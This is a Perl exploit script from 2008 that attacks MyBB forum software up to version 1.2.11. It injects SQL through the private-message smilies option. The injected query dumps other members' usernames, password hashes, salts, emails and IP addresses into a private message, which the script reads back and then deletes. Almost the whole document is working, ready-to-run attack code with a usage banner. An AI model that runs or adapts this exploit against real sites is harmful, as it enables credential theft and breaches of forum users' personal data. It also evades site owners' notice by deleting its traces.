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Posted on 07 February 2008

#!/usr/bin/perl # # MyBB <=1.2.11 SQL Injection Exploit based on http://www.waraxe.us/advisory-64.html # # Needs MySQL >=4.1 and a valid registration. # # By F # use IO::Socket; use LWP::UserAgent; use HTTP::Cookies; use HTML::Entities; #### print(" "); print("############################################################################ "); print("# MyBB <=1.2.11 SQL Injection Exploit by F # "); print("############################################################################ "); if(@ARGV<5){ print("# Usage: perl mybb1211.pl host path user pass victim_uid [last_victim_uid] # "); print("############################################################################ "); exit; }; $host="http://".$ARGV[0]; $path=$ARGV[1]; $user=$ARGV[2]; $pass=$ARGV[3]; $vid1=$ARGV[4]; if(@ARGV<=5){ $vidn=$vid1; }else{ $vidn=$ARGV[5]; }; print(" "); print(" [~] Host: ".$host." "); print(" [~] Path: ".$path." "); print(" [~] User: ".$user." "); print(" [~] Pass: ".$pass." "); print(" [~] From #".$vid1." "); print(" [~] To #".$vidn." "); print(" "); #### # create $browser and $cookie_jar $browser=LWP::UserAgent->new() or die(" [-] Cannot create new UserAgent "); $cookie_jar=HTTP::Cookies->new(); $browser->cookie_jar($cookie_jar); # try to log in $result=$browser->post( $host.$path."member.php", Content=>[ "action"=>"do_login", "username"=>$user, "password"=>$pass, "url"=>$host.$path."index.php", "submit"=>"Login", ], ); # check cookie if($cookie_jar->as_string=~m/mybbuser=.*?;/){ print(" [+] Login successful "); }else{ print(" [-] Login unsuccessful "); exit; }; # try to get uid $result=$browser->get($host.$path."usercp.php"); # check result if($result->as_string=~m/member.php?action=profile&amp;uid=([0-9]*?)"/){ $uid=$1; print(" [+] Getting uid successful: ".$uid." "); }else{ print(" [-] Getting uid unsuccessful "); exit; }; # construct exploit $exploit ="yes','0','0'),"; $exploit.="('".$uid."','".$uid."','".$uid."','1','haxx_result','0',concat('(haxx_start)',"; for($vid=$vid1;$vid<=$vidn;$vid++){ $exploit.="ifnull((select concat(uid,'-',username,':',password,':',salt,'::',email,'-',usergroup,'-',additionalgroups,'-',website,'-',regip,'(haxx_delim)') from mybb_users where uid=".$vid."),''),"; }; $exploit.="'(haxx_end)'),'".time()."','0','no','yes"; # try to send exploit $result=$browser->post( $host.$path."private.php", Content=>[ "action"=>"do_send", "subject"=>"haxx_message=".(1+rand(65536)), "message"=>"nuthin".(1+rand(65536)), "to"=>$user, "options[disablesmilies]"=>$exploit, ], ); # check if user is valid if( ($result->as_string=~m/Your account has either been suspended or you have been banned from accessing this resource./) || ($result->as_string=~m/You do not have permission to access this page./) || ($result->as_string=~m/Your account may still be awaiting activation or moderation./) ){ print(" [-] User has no permission to send private messages. This can happen if the user is suspended, banned, unactivated, or for other similar reasons. "); exit; }; # check the 5 minute cap if($result->as_string=~m/You have already submitted the same private message to the same recipient within the last 5 minutes./){ print(" [-] Unsuccessful attempt to fool MyBB with the 5 minute limit on sending private messages. Please run the exploit again. "); exit; }; # delete auxiliary message $result=$browser->get($host.$path."private.php?fid=1"); if($result->as_string=~m/private.php?action=read&amp;pmid=([0-9]*?)">haxx_message=[0-9]*?</){ print(" [+] The auxiliary message was found and successfully deleted "); $pmid=$1; $browser->get($host.$path."private.php?action=delete&pmid=".$pmid); }else{ print(" [-] Warning! The auxiliary message wasn't found and could not be deleted! "); }; # download and delete result message if($result->as_string=~m/private.php?action=read&amp;pmid=([0-9]*?)">haxx_result</){ print(" [+] The result message was found. Getting hashes. "); $pmid=$1; $result=$browser->get($host.$path."private.php?action=read&pmid=".$pmid); if($result->as_string=~m/(haxx_start)(.*)(haxx_end)/s){ $pm=$1; $pm=~s/(haxx_delim)/ /g; $pm=~s/<br />//g; $pm=decode_entities($pm); print($pm); }; $browser->get($host.$path."private.php?action=delete&pmid=".$pmid); }else{ print(" [-] The result message wasn't found. Exploit failed! "); exit; };